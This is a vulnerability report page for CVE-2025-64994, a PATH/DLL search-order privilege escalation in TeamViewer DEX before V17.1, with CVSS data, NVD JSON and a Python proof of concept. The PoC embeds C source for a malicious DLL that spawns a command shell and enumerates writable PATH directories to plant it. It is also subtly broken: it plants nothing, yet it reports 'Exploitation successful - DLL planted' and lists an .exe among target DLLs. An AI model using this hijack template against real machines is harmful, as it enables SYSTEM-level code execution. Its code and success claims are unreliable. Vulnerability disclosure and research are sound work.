Security Vulnerability Report
中文
CVE-2025-64994 CVSS 6.5 MEDIUM

CVE-2025-64994

Published: 2025-12-11 12:16:26
Last Modified: 2026-01-09 02:04:10
Source: [email protected]

Description

A privilege escalation vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Nomad-SetWorkRate instruction prior V17.1. The improper handling of executable search paths could allow local attackers with write access to a PATH directory on a device to escalate privileges and execute arbitrary code as SYSTEM.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:teamviewer:digital_employee_experience:*:*:*:*:*:*:*:* - VULNERABLE
TeamViewer DEX (1E DEX) < 17.1
1E-Nomad-SetWorkRate instruction < V17.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64994 PoC - TeamViewer DEX DLL Hijacking # This PoC demonstrates the DLL search order hijacking vulnerability # in 1E-Nomad-SetWorkRate instruction prior to V17.1 import os import sys import ctypes from ctypes import wintypes # Malicious DLL source code that will be compiled exploit_dll_source = ''' #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if (fdwReason == DLL_PROCESS_ATTACH) { // Create elevated command prompt or execute payload STARTUPINFOA si = {0}; PROCESS_INFORMATION pi = {0}; si.cb = sizeof(si); // Execute calc.exe as demonstration (in real attack, this would be malicious code) CreateProcessA("C:\\\\Windows\\\\System32\\\\cmd.exe", "/c calc.exe", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); } return TRUE; } ''' def check_path_directories(): """Check for writable PATH directories that could be exploited""" path = os.environ.get('PATH', '') writable_dirs = [] for directory in path.split(';'): if directory and os.path.exists(directory): try: test_file = os.path.join(directory, '.write_test') with open(test_file, 'w') as f: f.write('test') os.remove(test_file) writable_dirs.append(directory) except: pass return writable_dirs def exploit_vulnerability(target_dll, writable_path): """Place malicious DLL in writable PATH directory""" malicious_dll_path = os.path.join(writable_path, target_dll) # In real attack, this would be a compiled malicious DLL # For demonstration, we show where the DLL would be placed print(f"[*] Placing malicious DLL at: {malicious_dll_path}") print(f"[*] When 1E-Nomad-SetWorkRate executes, it will load this DLL") print(f"[*] The DLL code will run with SYSTEM privileges") return True def main(): print("=" * 60) print("CVE-2025-64994 - TeamViewer DEX DLL Search Order Hijacking") print("=" * 60) # Check for writable PATH directories print("\n[*] Enumerating writable PATH directories...") writable_dirs = check_path_directories() if not writable_dirs: print("[-] No writable PATH directories found") return print(f"[+] Found {len(writable_dirs)} writable directories:") for d in writable_dirs: print(f" - {d}") # Target DLLs commonly used by 1E Nomad target_dlls = [ "Nomad.exe", "1ENomad.dll", "NomadSL.dll" ] # Attempt exploitation for dll in target_dlls: for path in writable_dirs: if exploit_vulnerability(dll, path): print(f"\n[!] Exploitation successful - DLL planted") print("[!] Wait for 1E-Nomad-SetWorkRate instruction execution") return if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64994", "sourceIdentifier": "[email protected]", "published": "2025-12-11T12:16:26.453", "lastModified": "2026-01-09T02:04:09.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A privilege escalation vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Nomad-SetWorkRate instruction prior V17.1. The improper handling of executable search paths could allow local attackers with write access to a PATH directory on a device to escalate privileges and execute arbitrary code as SYSTEM."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.6, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:teamviewer:digital_employee_experience:*:*:*:*:*:*:*:*", "versionEndExcluding": "17.1", "matchCriteriaId": "9664D676-2739-4C0C-B1C0-BF7DACF4DA1A"}]}]}], "references": [{"url": "https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.